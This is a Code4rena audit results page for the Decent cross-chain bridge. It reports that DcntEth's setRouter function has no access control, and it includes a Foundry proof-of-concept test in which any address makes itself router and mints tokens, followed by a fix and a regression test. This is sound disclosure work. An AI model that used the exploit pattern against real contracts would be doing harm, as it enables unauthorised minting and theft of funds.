Decent - 0xSimeon's results

Decent enables one-click transactions using any token across chains.

General Information

Platform: Code4rena

Start Date: 19/01/2024

Pot Size: $36,500 USDC

Total HM: 9

Participants: 113

Period: 3 days

Judge: 0xsomeone

Id: 322

League: ETH

Researcher Performance

Rank: 80/113

Findings: 1

Award: $0.12

🌟 Selected for report: 0

🚀 Solo Findings: 0

Lines of code

https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DcntEth.sol#L20

Vulnerability details

`DcntEth::setRouter` has no access control, so anyone can call it and pass an arbitrary address, which is then used as the router across system calls.

Impact

Anyone can set the router, which causes undefined and unexpected behavior in every system call that relies on the router. An attacker or malicious user can gain control of the following functions:

  • DcntEth::mint
  • DcntEth::burn

The attacker can then mint and burn DcntEth, which is an OFTV2 (omnichain fungible token), at will.

Proof of Concept

Add the following test to DebugActions.t.sol or any Foundry test file.

Don't forget to add the following imports:

```solidity
import {DcntEth} from "../lib/decent-bridge/src/DcntEth.sol";
import {Test} from "forge-std/Test.sol";
```

```solidity
function test_MissingDecentEthAccessControl() public {
    // Deploy a new DcntEth token contract.
    // Assumption: the constructor takes the LayerZero endpoint address; a
    // placeholder address is enough because no cross-chain call is made here.
    DcntEth dcntEth = new DcntEth(makeAddr("lzEndpoint"));

    // Example amount to mint.
    uint256 UserMintAmount = 1_000_000 ether;

    // Make an arbitrary user with no special role.
    address arbitraryUser = makeAddr("anyUser");

    // Set the router to arbitraryUser. The call comes from the test contract,
    // and nothing restricts who may make it.
    dcntEth.setRouter(arbitraryUser);

    // Now arbitraryUser can call the router-privileged functions: mint & burn.
    vm.startPrank(arbitraryUser);
    dcntEth.mint(arbitraryUser, UserMintAmount);
    dcntEth.burn(arbitraryUser, 1);

    vm.stopPrank();

    assertEq(dcntEth.balanceOf(arbitraryUser), UserMintAmount - 1);
}
```
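The inverse of the PoC above, as an added example that is not part of the original submission or the Decent code base: a Foundry regression test that passes only when `setRouter` is restricted to the owner. `GatedToken` is a hypothetical stand-in that models just the router gating, and the test name and addresses are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;

import {Test} from "forge-std/Test.sol";

// Hypothetical stand-in for DcntEth (added example): only the router gating
// is modelled, with setRouter restricted to the deployer acting as owner.
contract GatedToken {
    address public immutable owner;
    address public router;
    mapping(address => uint256) public balanceOf;

    error NotOwner();
    error NotRouter();

    constructor() { owner = msg.sender; }

    function setRouter(address _router) external {
        if (msg.sender != owner) revert NotOwner();
        router = _router;
    }

    function mint(address to, uint256 amount) external {
        if (msg.sender != router) revert NotRouter();
        balanceOf[to] += amount;
    }
}

contract SetRouterAccessControlTest is Test {
    GatedToken token;
    address attacker = makeAddr("attacker");   // constructed test address
    address legitRouter = makeAddr("router");  // constructed test address

    function setUp() public {
        token = new GatedToken(); // the test contract becomes the owner
    }

    function test_NonOwnerCannotSetRouterOrMint() public {
        // A non-owner must not be able to install itself as router.
        vm.prank(attacker);
        vm.expectRevert(GatedToken.NotOwner.selector);
        token.setRouter(attacker);

        token.setRouter(legitRouter); // the owner call still succeeds

        // With the router untouched, the attacker cannot mint.
        vm.prank(attacker);
        vm.expectRevert(GatedToken.NotRouter.selector);
        token.mint(attacker, 1 ether);
        assertEq(token.balanceOf(attacker), 0);
        assertEq(token.router(), legitRouter);
    }
}
```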

Tools Used

Manual Analysis

Add the onlyOwner modifier to the DcntEth::setRouter function

```diff DcntEth::setRouter

- function setRouter(address _router) public {
-     router = _router;
- }
+ function setRouter(address _router) public onlyOwner {
+     router = _router;
+ }
```
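
Review bot: on the added `function setRouter(address _router) public onlyOwner` line, `router = _router` still accepts any value the owner passes, including the zero address, and the function emits no event, so a mistaken or later-changed router is hard to notice off-chain. Consider rejecting `address(0)` and emitting an event carrying the old and new router. Also confirm that DcntEth's inheritance actually provides `onlyOwner` and that ownership is assigned to the intended admin at deployment, since neither is visible in these lines.
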
Assessed type

Access Control

#0 - c4-pre-sort

2024-01-25T21:49:31Z

raymondfam marked the issue as sufficient quality report

#1 - c4-pre-sort

2024-01-25T21:49:36Z

raymondfam marked the issue as duplicate of #14

#2 - c4-judge

2024-02-03T13:07:34Z

alex-ppg marked the issue as satisfactory
